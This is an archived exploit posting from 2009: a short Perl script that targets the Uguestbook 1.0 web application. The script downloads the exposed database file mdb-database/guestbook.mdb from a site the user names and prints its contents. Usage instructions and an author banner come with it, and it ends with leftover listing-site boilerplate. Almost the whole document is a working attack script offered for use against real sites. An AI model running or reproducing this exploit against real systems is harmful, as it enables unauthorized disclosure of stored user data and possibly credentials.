uguestbook-disclose.txt

Posted on 05 May 2009
#!/usr/bin/perl
#
#
# Uguestbook 1.0
# mdb-database/guestbook.mdb
#
#
#
#
#
#
#
use LWP::Simple;
use LWP::UserAgent;

print "	Uguestbook 1.0 Arbitrary Database Disclosure Exploit
";

print "	****************************************************************
";
print "	*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *
";
print "	*           E-mail : Paradis_des_fous[at]hotmail.fr            *
";
print "	*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *
";
print "	*               From : MoroccO Figuig/Oujda City               *
";
print "	****************************************************************



";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site 
";
print "[X] Exemple : perl $0 www.site.com 
";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......

");
sleep(5);
$database = "mdb-database/guestbook.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...

");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................
");
print("$doexploit
");
print("..............................EOF.................................
");
}
else {
help();
exit;
}
TOP
Malware :

None in database
Last 20
Exploits :

Last 20